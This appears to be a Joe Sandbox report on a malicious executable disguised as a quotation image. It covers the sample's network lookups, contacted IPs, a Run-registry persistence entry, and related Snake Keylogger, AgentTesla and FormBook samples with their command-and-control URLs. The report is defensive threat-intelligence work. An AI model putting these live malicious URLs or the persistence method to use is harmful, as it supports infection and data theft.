00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://stackoverflow.com/q/11564914/23354;RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://stackoverflow.com/q/2152978/23354RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://checkip.dyndns.orghInstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://checkip.dyndns.org/qRFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/mgravell/protobuf-netRFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://checkip.dyndns.orgInstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003007000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029EC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://checkip.dyndns.comInstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://wymascensores.comRFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.000000000261D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003251000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000028E1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://reallyfreegeoip.org/xml/RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029A9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        67.212.175.162
                        		wymascensores.comUnited States
                        		32475SINGLEHOP-LLCUStrue
                        188.114.96.3
                        		reallyfreegeoip.orgEuropean Union
                        		13335CLOUDFLARENETUStrue
                        158.101.44.242
                        		checkip.dyndns.comUnited States
                        		31898ORACLE-BMC-31898USfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1519289
                        Start date and time:2024-09-26 09:57:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 11m 19s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:9
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:RFQ____RM quotation_JPEG IMAGE.img.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@9/2@3/3
                        EGA Information:
                        • Successful, ratio: 83.3%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 438
                        • Number of non-executed functions: 35
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target InstallUtil.exe, PID 5500 because it is empty
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: RFQ____RM quotation_JPEG IMAGE.img.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        03:58:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Gydvapkca C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        03:58:03API Interceptor12691963x Sleep call for process: InstallUtil.exe modified
                        03:58:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Gydvapkca C:\Users\user\AppData\Roaming\Gydvapkca.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        67.212.175.162BITUMEN_60-70_-_JUMBO_Specification.exeGet hashmaliciousFormBook, NSISDropperBrowse
                        • www.northjerseylocksmith.net/2nbp/?ab=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1g60uhCq/kzTYQUQ==&wZHp=LTklpdd0lp
                        EL-515-_HEAT_TRACING.exeGet hashmaliciousFormBook, NSISDropperBrowse
                        • www.northjerseylocksmith.net/2nbp/?I8Z=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1tnGq8XaOUlQYxDpzveej3TzCy&WN6=OLgLTlRhCRRxTxN
                        188.114.96.3ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                        • www.chinaen.org/zi4g/
                        http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                        • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                        Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                        • www.444317.com/
                        Sept order.docGet hashmaliciousFormBookBrowse
                        • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                        1e#U0414.exeGet hashmaliciousLokibotBrowse
                        • dddotx.shop/Mine/PWS/fre.php
                        https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                        • hdcy.emcl00.com/qRCfs/
                        PO23100072.exeGet hashmaliciousFormBookBrowse
                        • www.cc101.pro/ttiz/
                        RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                        • www.1win-moldovia.fun/1g7m/
                        TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                        • www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
                        Petronas quotation request.exeGet hashmaliciousFormBookBrowse
                        • www.chinaen.org/zi4g/

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        reallyfreegeoip.orgPayment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.97.3
                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 188.114.96.3
                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.97.3
                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.97.3
                        z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 188.114.96.3
                        SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                        • 188.114.97.3
                        inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.97.3
                        checkip.dyndns.comPayment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 132.226.247.73
                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 193.122.130.0
                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 193.122.130.0
                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                        • 132.226.8.169
                        Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 132.226.8.169
                        SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 193.122.6.168
                        z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 132.226.247.73
                        SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                        • 193.122.130.0
                        inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 158.101.44.242
                        SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 132.226.247.73
                        wymascensores.comSu documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                        • 67.212.175.162
                        Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                        • 67.212.175.162
                        1715875158543a5e3b677362bc060cf9b6a7a69e2457d0c48ef2d6bda0e2ce3c4ddc38a017752.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                        • 67.212.175.162
                        Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 67.212.175.162
                        rDocumentodeembarque.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 67.212.175.162
                        ORGB.exeGet hashmaliciousAgentTeslaBrowse
                        • 67.212.175.162
                        16994321449b5d87caf658afbfe178cb9c8422736bcc47ae132c88fa1893a91c088bd24282963.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                        • 67.212.175.162
                        Korea_Order-68652781178.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                        • 67.212.175.162
                        jpg_7657689879_Detalles_del_producto_EBM_PAPST_ARGENTINA_S.A..exeGet hashmaliciousAgentTeslaBrowse
                        • 67.212.175.162
                        15220312408_20230909_09172103_HesapOzeti.pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 67.212.175.162

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSp37SE6gM52.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                        • 104.21.37.97
                        3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                        • 172.67.208.139
                        HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                        • 104.21.17.90
                        gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                        • 104.21.70.136
                        a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                        • 104.21.58.182
                        iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                        • 104.21.37.97
                        Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                        • 104.26.13.205
                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 188.114.96.3
                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        ORACLE-BMC-31898USPayment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 158.101.44.242
                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 193.122.130.0
                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 158.101.44.242
                        Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 158.101.44.242
                        http://ec44d1ee.freyy.pages.dev/Zimbra%20Web%20Client%20Sign%20In/Get hashmaliciousUnknownBrowse
                        • 147.154.16.196
                        SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 193.122.6.168
                        SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                        • 193.122.130.0
                        inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 158.101.44.242
                        SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 158.101.44.242
                        E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 193.122.130.0
                        SINGLEHOP-LLCUShttps://xtrafree.x10.mx/Get hashmaliciousUnknownBrowse
                        • 198.91.81.14
                        http://dev-265334124785.pantheonsite.io/Get hashmaliciousUnknownBrowse
                        • 198.143.164.252
                        http://dev-gdtf.pantheonsite.io/Get hashmaliciousUnknownBrowse
                        • 198.143.164.252
                        http://www.rb.gy/onu2r0/Get hashmaliciousUnknownBrowse
                        • 198.143.164.252
                        http://www.rb.gy/v99361/Get hashmaliciousUnknownBrowse
                        • 198.143.164.252
                        rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                        • 172.96.187.60
                        http://www.rb.gy/yfdl7y/Get hashmaliciousUnknownBrowse
                        • 198.143.164.252
                        http://www.rb.gy/h66x7g/Get hashmaliciousUnknownBrowse
                        • 198.143.164.252
                        http://www.rb.gy/6ucw3c/Get hashmaliciousUnknownBrowse
                        • 198.143.164.252
                        https://dev-612101459966.pantheonsite.io/Get hashmaliciousUnknownBrowse
                        • 198.143.164.252

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        54328bd36c14bd82ddaa0c04b25ed9adQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 188.114.96.3
                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 188.114.96.3
                        SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                        • 188.114.96.3
                        inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 188.114.96.3
                        file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                        • 188.114.96.3
                        3b5074b1b5d032e5620f69f9f700ff0eRFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                        • 67.212.175.162
